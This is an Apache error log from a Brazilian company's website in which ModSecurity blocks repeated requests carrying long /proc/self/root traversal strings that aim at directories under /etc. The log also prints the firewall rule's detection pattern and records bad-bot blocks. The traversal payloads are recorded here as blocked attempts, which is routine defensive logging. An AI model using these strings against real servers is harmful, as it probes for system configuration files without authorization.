[Wed Mar 18 12:58:20.371298 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.243.128:54156] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrLm_u8EFLIOrSqIpsagwAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:58:29.903978 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.243.128:42410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrLpQkwaGbbGflqUZAnwQAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:59:37.659553 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.241.31:43364] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrL6QkwaGbbGflqUZAoFAAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:59:38.084530 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.243.128:47454] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrL6uw_le52K8_3pV32GgAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 12:59:45.519619 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.243.128:54130] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrL8fu8EFLIOrSqIpsawgAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:59:54.291246 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.241.31:44238] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrL-sdf6f5d65gmYZTsWQAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:00:05.145875 2026] [mime_magic:error] [pid 26799:tid 140411683178240] (70014)End of file found: [client 57.141.18.110:55262] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 13:00:09.277626 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.243.128:54138] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrMCeyqAr6etmhZHNrdxgAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:00:09.929756 2026] [mime_magic:error] [pid 30077:tid 140411691570944] (70014)End of file found: [client 57.141.18.91:55106] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 13:00:23.309775 2026] [:error] [pid 29882:tid 140411683178240] [client 74.7.241.31:44742] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrMF0zinOy1jxa1j4ct4AAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc
[Wed Mar 18 13:00:25.686901 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.241.31:49438] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrMGdY0UrI5A3LftIzLIwAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:01:50.020535 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:34622] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrMbuoXxyEfFpUF8f-E-gAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:01:53.450584 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.241.31:53170] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrMcQkwaGbbGflqUZAotgAAAM8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:01:55.723157 2026] [:error] [pid 15051:tid 140411582465792] [client 74.7.243.128:45158] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrMcymAPhZkrhU8w4mFFAAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:01:57.032584 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:45166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrMdeyqAr6etmhZHNreBwAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:02:23.756178 2026] [mime_magic:error] [pid 17887:tid 140411641214720] (70014)End of file found: [client 57.141.18.85:60820] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 13:02:42.259167 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.241.31:55026] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrMouoXxyEfFpUF8f-FTQAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Wed Mar 18 13:02:45.774613 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.243.128:45170] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrMpSmAPhZkrhU8w4mFWQAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:03:20.137874 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:48338] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrMyNY0UrI5A3LftIzL6wAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:04:04.442861 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.228.61:52176] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrM9AkwaGbbGflqUZApIAAAAM4"]
[Wed Mar 18 13:04:04.823418 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.241.31:45000] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrM9NY0UrI5A3LftIzMJgAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:04:08.240560 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.244.43:48270] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrM-OoXxyEfFpUF8f-FjwAAAVY"]
[Wed Mar 18 13:04:09.523649 2026] [:error] [pid 29882:tid 140411607643904] [client 74.7.241.31:52210] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrM-UzinOy1jxa1j4cukgAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:04:49.792755 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:36370] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrNIda6ubjKNq_cu4a19wAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:05:01.151285 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.243.128:47834] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrNLfu8EFLIOrSqIpsblgAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
